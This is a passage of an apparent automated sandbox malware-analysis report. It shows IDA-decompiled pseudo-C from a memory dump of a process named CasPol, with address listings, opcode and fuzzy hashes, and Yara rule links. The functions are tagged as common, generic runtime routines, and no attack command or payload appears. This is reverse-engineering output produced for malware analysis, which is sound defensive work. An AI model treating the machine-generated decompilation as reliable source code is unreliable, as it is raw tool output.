																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x015ed5f2
0x015ed5f5
0x015ed5f5
0x015ed5fd
0x015ed600
0x015ed60a
0x015ed60d
0x015ed617
0x015ed61d
0x015ed627
0x015ed62e
0x015ed911
0x015ed913
0x00000000
0x015ed919
0x015ed919
0x015ed919
0x015ed634
0x015ed634
0x015ed634
0x015ed634
0x015ed640
0x015ed8bf
0x00000000
0x015ed646
0x015ed646
0x015ed64d
0x015ed652
0x0163b2fc
0x0163b2fc
0x0163b302
0x0163b33b
0x0163b341
0x00000000
0x0163b304
0x0163b304
0x0163b319
0x0163b31e
0x0163b324
0x0163b326
0x0163b332
0x0163b347
0x0163b34c
0x0163b351
0x0163b35a
0x00000000
0x0163b328
0x0163b328
0x00000000
0x0163b328
0x0163b326
0x015ed658
0x015ed658
0x015ed65b
0x015ed665
0x00000000
0x015ed66b
0x015ed66b
0x015ed66b
0x015ed66b
0x015ed66d
0x015ed672
0x015ed67a
0x00000000
0x00000000
0x015ed680
0x015ed686
0x015ed8ce
0x015ed8d4
0x015ed8dd
0x015ed8e0
0x015ed68c
0x015ed691
0x015ed69d
0x015ed6a2
0x015ed6a7
0x015ed6b0
0x015ed6b5
0x015ed6e0
0x015ed6b7
0x015ed6b7
0x015ed6b9
0x015ed6b9
0x015ed6bb
0x015ed6bd
0x015ed6ce
0x015ed6d0
0x015ed6d2
0x0163b363
0x0163b365
0x00000000
0x0163b36b
0x00000000
0x0163b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x015ed6bf
0x015ed6bf
0x015ed6e5
0x015ed6e7
0x015ed6e9
0x015ed6ec
0x015ed6ec
0x015ed6ef
0x015ed6f5
0x015ed6f9
0x015ed6fb
0x015ed6fd
0x015ed701
0x015ed703
0x015ed70a
0x015ed70a
0x015ed701
0x015ed710
0x015ed710
0x015ed6c1
0x015ed6c1
0x015ed6c6
0x0163b36d
0x0163b36f
0x00000000
0x0163b375
0x0163b375
0x0163b375
0x00000000
0x0163b375
0x00000000
0x015ed6cc
0x015ed6d8
0x015ed6d8
0x015ed6d8
0x00000000
0x015ed6c6
0x015ed6bf
0x00000000
0x015ed6da
0x015ed6da
0x015ed716
0x015ed71b
0x015ed720
0x015ed726
0x015ed726
0x015ed72d
0x00000000
0x015ed733
0x015ed739
0x015ed742
0x015ed750
0x015ed758
0x015ed764
0x015ed776
0x015ed77a
0x015ed783
0x015ed928
0x015ed92c
0x015ed93d
0x015ed944
0x015ed94f
0x015ed954
0x015ed956
0x015ed95f
0x015ed961
0x015ed973
0x015ed973
0x015ed956
0x015ed944
0x015ed92c
0x015ed78b
0x0163b394
0x015ed791
0x015ed798
0x0163b3a3
0x0163b3bb
0x0163b3bb
0x015ed7a5
0x015ed866
0x015ed870
0x015ed892
0x015ed898
0x015ed89e
0x015ed8a0
0x015ed8a6
0x015ed8ac
0x015ed8ae
0x015ed8b4
0x015ed8b4
0x015ed8ae
0x015ed7a5
0x015ed78b
0x015ed7b1
0x0163b3c5
0x0163b3c5
0x015ed7c3
0x015ed7ca
0x015ed7e5
0x015ed7eb
0x015ed8eb
0x015ed8ed
0x00000000
0x015ed8f3
0x015ed8f3
0x015ed8f3
0x00000000
0x015ed8ed
0x015ed7cc
0x015ed7cc
0x015ed7d2
0x00000000
0x015ed7d4
0x015ed7d4
0x015ed7d7
0x015ed7df
0x0163b3d4
0x0163b3d9
0x0163b3dc
0x0163b3dc
0x0163b3df
0x0163b3e2
0x0163b468
0x0163b46d
0x0163b46f
0x0163b46f
0x0163b475
0x015ed8f8
0x015ed8f9
0x015ed8fd
0x0163b3e8
0x0163b3e8
0x0163b3eb
0x0163b3ed
0x00000000
0x0163b3ef
0x0163b3ef
0x0163b3f1
0x0163b3f4
0x0163b3fe
0x0163b404
0x0163b409
0x0163b40e
0x0163b410
0x0163b410
0x0163b414
0x0163b414
0x0163b41b
0x0163b420
0x0163b423
0x0163b425
0x0163b427
0x0163b42a
0x0163b42d
0x0163b42d
0x0163b42a
0x0163b432
0x0163b436
0x0163b438
0x0163b43b
0x0163b43b
0x0163b449
0x0163b44e
0x0163b454
0x0163b458
0x0163b458
0x0163b45d
0x00000000
0x0163b45d
0x0163b3ed
0x00000000
0x00000000
0x00000000
0x015ed7df
0x015ed7d2
0x015ed7ca
0x0163b37c
0x0163b37e
0x0163b385
0x0163b38a
0x00000000
0x0163b38a
0x015ed742
0x015ed7f1
0x015ed7f8
0x0163b49b
0x0163b49b
0x015ed800
0x015ed837
0x015ed843
0x015ed845
0x015ed847
0x015ed84a
0x015ed84b
0x015ed84e
0x015ed857
0x015ed818
0x015ed824
0x015ed831
0x0163b4a5
0x0163b4ab
0x0163b4b3
0x0163b4b8
0x0163b4bb
0x00000000
0x0163b4c1
0x0163b4c1
0x0163b4c8
0x00000000
0x0163b4ce
0x0163b4d4
0x0163b4e1
0x0163b4e3
0x0163b4e5
0x00000000
0x0163b4eb
0x0163b4f0
0x0163b4f2
0x015edac9
0x015edacc
0x015edacf
0x015edad1
0x015edd78
0x015edd78
0x015edcf2
0x00000000
0x015edad7
0x015edad9
0x015edadb
0x00000000
0x00000000
0x015edae1
0x015edae1
0x015edae4
0x015edae6
0x0163b4f9
0x0163b4f9
0x0163b500
0x015edaec
0x015edaec
0x015edaf5
0x015edaf8
0x015edafb
0x015edb03
0x015edb11
0x015edb16
0x015edb19
0x015edb1b
0x0163b52c
0x0163b531
0x0163b534
0x015edb21
0x015edb21
0x015edb24
0x015edcd9
0x015edce2
0x015edce5
0x015edd6a
0x015edd6d
0x00000000
0x015edd73
0x0163b51a
0x0163b51c
0x0163b51f
0x0163b524
0x00000000
0x0163b524
0x015edce7
0x015edce7
0x015edce7
0x00000000
0x015edce7
0x00000000
0x015edb2a
0x015edb2c
0x015edb31
0x015edb33
0x015edb36
0x015edb39
0x015edb3b
0x015edb66
0x015edb66
0x015edb3d
0x015edb3d
0x015edb3e
0x015edb46
0x015edb47
0x015edb49
0x015edb4c
0x015edb53
0x015edb55
0x015edb58
0x015edb5a
0x0163b50a
0x0163b50f
0x0163b512
0x015edb60
0x015edb60
0x015edb63
0x015edb63
0x00000000
0x015edb63
0x015edb5a
0x015edb3b
0x015edb24
0x015edb69
0x015edb69
0x015edb6c
0x015edb6f
0x015edb74
0x0163b557
0x0163b557
0x0163b55e
0x015edb7a
0x015edb7c
0x015edb7f
0x015edb82
0x015edb85
0x00000000
0x015edb8b
0x015edb8b
0x015edb8d
0x015edb9b
0x015edb9b
0x015edb9d
0x015edba0
0x015edba2
0x015edba4
0x015edba7
0x015edba9
0x015edbae
0x015edbae
0x015edbb1
0x015edbb4
0x015edbb4
0x015edbb7
0x015edbba
0x015edcd2
0x015edcd4
0x00000000
0x015edbc0
0x015edbc0
0x015edbd2
0x015edbd7
0x015edbda
0x015edbdd
0x015edbdf
0x00000000
0x015edbe5
0x015edbe5
0x015edbee
0x015edbf1
0x0163b541
0x0163b544
0x00000000
0x0163b546
0x0163b546
0x00000000
0x0163b546
0x015edbf7
0x015edbf7
0x015edbfd
0x015edbfd
0x015edbff
0x015edc0b
0x015edc15
0x015edc1b
0x015edc1d
0x015edc21
0x015edc21
0x015edc23
0x015edc23
0x015edc26
0x015edc29
0x015edc2b
0x00000000
0x00000000
0x015edc31
0x015edc34
0x015edc36
0x015edcbf
0x015edcbf
0x015edcc2
0x00000000
0x015edc3c
0x015edc41
0x015edc43
0x00000000
0x015edc45
0x015edc45
0x015edc47
0x00000000
0x015edc4d
0x015edc4d
0x015edc50
0x015edc52
0x015edc55
0x015edcfa
0x015edcfe
0x015edd08
0x015edd0a
0x015edd0c
0x00000000
0x015edd12
0x015edd15
0x015edd2d
0x015edd2f
0x015edd32
0x015edd35
0x00000000
0x015edd35
0x015edc5b
0x015edc5b
0x015edc5e
0x015edc61
0x015edc64
0x015edc67
0x015edc67
0x015edc6a
0x015edc6c
0x015edc8e
0x015edc8e
0x015edc91
0x015edc93
0x015edcce
0x015edcce
0x015edc95
0x015edc9c
0x015edc6e
0x015edc72
0x015edc75
0x015edc77
0x015edc79
0x0163b551
0x0163b551
0x00000000
0x015edc7f
0x015edc7f
0x015edc81
0x00000000
0x015edc83
0x015edc86
0x015edc88
0x00000000
0x00000000
0x00000000
0x00000000
0x015edc88
0x015edc81
0x015edc79
0x015edc6c
0x015edc55
0x015edc47
0x015edc43
0x00000000
0x015edc36
0x015edc23
0x00000000
0x015edbff
0x015edbf1
0x015edbdf
0x015edb8f
0x015edb92
0x015edb95
0x00000000
0x00000000
0x00000000
0x00000000
0x015edb95
0x015edb8d
0x015edb85
0x015edb74
0x015edc9f
0x015edca2
0x015edcb0
0x015edcb0
0x015edad1
0x0163b4e5
0x0163b4c8
0x00000000
0x00000000
0x00000000
0x015ed831
0x00000000
0x015ed800
0x0163b47f
0x0163b485
0x00000000
0x0163b485
0x015ed665
0x015ed652
0x00000000

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151aeb11ef117296874e54ded1184afd1d6da6ef3ef490e2b5a80958d2f83389
Instruction ID: 4a6dd4903717924ae8a49928a931d869bbe5d81d909358dbcb663fcb24ef19fd
Opcode Fuzzy Hash: 151aeb11ef117296874e54ded1184afd1d6da6ef3ef490e2b5a80958d2f83389
Instruction Fuzzy Hash: 43E19E30E0526A8FEB399F68CC88B7DBBF6BF85304F044199D9099B291D774A981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 015E849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E015E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x16af9c0);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x16c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E015ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E015F2280( *[fs:0x30], 0x16c8550);
						_t139 =  *0x16c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0160F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E015EFFB0(_t193, _t235, 0x16c8550);
								L5:
								return E0162D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E015D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x16c7b9c; // 0x0
							_t235 = L015F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x16c7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0160A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E015EFFB0(_t193, _t235, 0x16c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L015F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L015F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x16c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x16c7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x16c7b9c; // 0x0
									_t214 = L015F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x16c7b10 =  *0x16c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x16c7b04 =  *0x16c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L015F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L015F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x16c7b08 =  *0x16c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0161F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L015F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0160A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L015F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x015e849b
0x015e849b
0x015e849b
0x015e849b
0x015e849d
0x015e84a2
0x015e84a7
0x015e84b1
0x015e84d8
0x00000000
0x015e84b3
0x015e84c4
0x015e84c9
0x015e84cd
0x015e84cf
0x015e84cf
0x015e84d6
0x015e84e6
0x015e84e9
0x015e84ec
0x015e84ef
0x015e84f2
0x015e84f4
0x015e84fc
0x015e8501
0x015e8506
0x015e8509
0x015e86e0
0x015e86e5
0x015e86e8
0x015e86ed
0x015e86f0
0x015e86f2
0x01639afd
0x01639b02
0x015e84da
0x015e84df
0x015e84df
0x015e86fa
0x015e86fd
0x015e86fe
0x015e8701
0x015e8706
0x015e8709
0x015e870b
0x00000000
0x00000000
0x015e8711
0x015e8725
0x015e8727
0x015e872a
0x015e872c
0x01639af0
0x01639af5
0x015e8732
0x015e8732
0x015e8732
0x015e8735
0x015e8737
0x015e8515
0x015e8515
0x015e8518
0x015e851d
0x015e8523
0x015e8527
0x015e852b
0x015e8537
0x015e8539
0x015e853c
0x015e853e
0x015e868c
0x015e8691
0x015e8699
0x015e869b
0x015e8744
0x015e8748
0x015e86a1
0x015e86a1
0x015e86a1
0x015e86a4
0x015e86a8
0x01639bdf
0x01639bdf
0x015e86ae
0x015e86b0
0x00000000
0x015e86b6
0x00000000
0x01639be9
0x015e86b0
0x015e8544
0x015e854a
0x015e854d
0x015e8551
0x015e876e
0x015e8778
0x015e877b
0x015e8780
0x015e8557
0x015e8557
0x015e855d
0x015e855d
0x015e856b
0x015e856e
0x015e8570
0x015e8573
0x015e8576
0x015e8576
0x015e8579
0x015e857b
0x00000000
0x00000000
0x015e8581
0x015e85a0
0x015e85a2
0x015e85a5
0x015e85a7
0x01639b1b
0x01639b1b
0x015e862e
0x015e862e
0x015e8631
0x015e8631
0x015e8634
0x015e8636
0x015e8669
0x015e8669
0x015e866b
0x01639bbf
0x01639bc4
0x01639bc8
0x01639bce
0x01639bce
0x015e8671
0x015e8671
0x015e8674
0x015e8676
0x01639bae
0x01639bae
0x015e8676
0x015e867c
0x015e867e
0x015e8688
0x015e8688
0x00000000
0x015e867e
0x015e8638
0x015e8638
0x015e863b
0x015e863e
0x015e863f
0x015e8642
0x015e8645
0x015e8648
0x015e864d
0x01639b69
0x01639b6e
0x01639b7b
0x01639b81
0x01639b85
0x01639b89
0x01639ba7
0x01639b8b
0x01639b91
0x01639b9a
0x01639b9f
0x01639b9f
0x015e8788
0x015e878d
0x015e8763
0x015e8763
0x015e8766
0x00000000
0x015e8766
0x01639b70
0x00000000
0x01639b70
0x015e8656
0x015e865a
0x015e865c
0x015e8752
0x015e8756
0x00000000
0x00000000
0x015e875e
0x00000000
0x015e875e
0x015e8662
0x015e8662
0x015e8662
0x015e8666
0x00000000
0x015e8666
0x015e85b7
0x015e85b9
0x015e85bc
0x015e85bf
0x015e85cc
0x015e85d1
0x015e85d4
0x015e85db
0x015e85de
0x015e85e0
0x01639b5f
0x00000000
0x01639b5f
0x015e85e6
0x015e85ea
0x015e86c3
0x015e86c5
0x015e86c8
0x015e86ca
0x01639b16
0x00000000
0x01639b16
0x015e86d6
0x015e85f6
0x015e85f6
0x015e85f9
0x015e8602
0x015e8606
0x015e860a
0x015e860b
0x015e860e
0x015e8611
0x00000000
0x015e8611
0x015e85f3
0x00000000
0x015e85f3
0x015e8619
0x015e861e
0x015e861e
0x015e8621
0x015e8622
0x015e8623
0x015e8625
0x015e862c
0x00000000
0x015e873d
0x00000000
0x015e873d
0x015e8737
0x015e850f
0x015e8512
0x00000000
0x015e8512
0x00000000
0x015e84d6

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8822eff73218f10e9a65722501228092509742334dbce312585a174e2e66ee5
Instruction ID: 78a0dd73d015a70771466ef5cee50e47464bf0d2261700097037b9066df9a80c
Opcode Fuzzy Hash: e8822eff73218f10e9a65722501228092509742334dbce312585a174e2e66ee5
Instruction Fuzzy Hash: C9B12BB0E0020ADFDB29DF99C984AAEBBF5BF98304F14452DE516AB345D770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0160513A Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a77cd066e80bd5bb635bb2361eca681753344b0abe948508e58f0910c295fc5
Instruction ID: caabb401776d7c7938a0ec58f2454df4f37d14fba7300625a24f7bb888012048
Opcode Fuzzy Hash: 9a77cd066e80bd5bb635bb2361eca681753344b0abe948508e58f0910c295fc5
Instruction Fuzzy Hash: F0C102755083818FD355CF28C980A5AFBE1BF89304F188A6EF9998B392D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 016003E2 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ea668ea1b762624027668a16c36fc6559697c47576f803f3a7af87084e6bad
Instruction ID: 9d9a171b634d6a868f2122222482ea53b19577f7d0ef8d7e6656f1fae3d17bad
Opcode Fuzzy Hash: 29ea668ea1b762624027668a16c36fc6559697c47576f803f3a7af87084e6bad
Instruction Fuzzy Hash: D6914432E00255AFEB379B6CCC45BBE7BA5AB05764F0A0265FA50AB3D1DB349D00C785

Uniqueness

Uniqueness Score: -1.00%

Function 015DC600 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb8315c761940c2e485c4a92796595a85b33e95f52a878d7b87fc12a5f5e7b7
Instruction ID: 13d5de0a2207a5d0a3cef7b09f1b88f08def193a73a4d29aebb101b8bf1029e5
Opcode Fuzzy Hash: edb8315c761940c2e485c4a92796595a85b33e95f52a878d7b87fc12a5f5e7b7
Instruction Fuzzy Hash: FA818C756442468BDB26CE58CC80A7AB7E9FF84354F18486EEE459B341D330ED85CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01656DC9 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 4c120ea7b038585187a5a6bbe0083ef5f40e23af29c5404ff3f71a20191ec10b
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: A5717171D0021AEFDB10DFA9C944ADEBBB9FF88710F504069E905EB250D730EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0166B8D0 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c0eddf98f411b95c647e6ed4bf66bcbe974b32eeafa291239552068b2d34e6
Instruction ID: 9a31c7014ccdd4a129d69edc3a5a73b9bbc34cf2dff51af2e8e80e0cc5ee36a7
Opcode Fuzzy Hash: 96c0eddf98f411b95c647e6ed4bf66bcbe974b32eeafa291239552068b2d34e6
Instruction Fuzzy Hash: B471CF32240702EFE7329F18CC44F6ABBBAEB44724F154528EA55DB6A0DB75E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015D52A5 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69ae7c6ce4eb5d318f844835584840f87385a44b1404d2b5d9bfb2adf40dada
Instruction ID: 86bc849b0431f574318827ecd21fcb6ec15b943ea70cc9519500573b41f392ad
Opcode Fuzzy Hash: b69ae7c6ce4eb5d318f844835584840f87385a44b1404d2b5d9bfb2adf40dada
Instruction Fuzzy Hash: 1B51A971615342ABD721DF28CC45B2BBBE5FFA4710F14092EF4958B651E770E848CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01602AE4 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

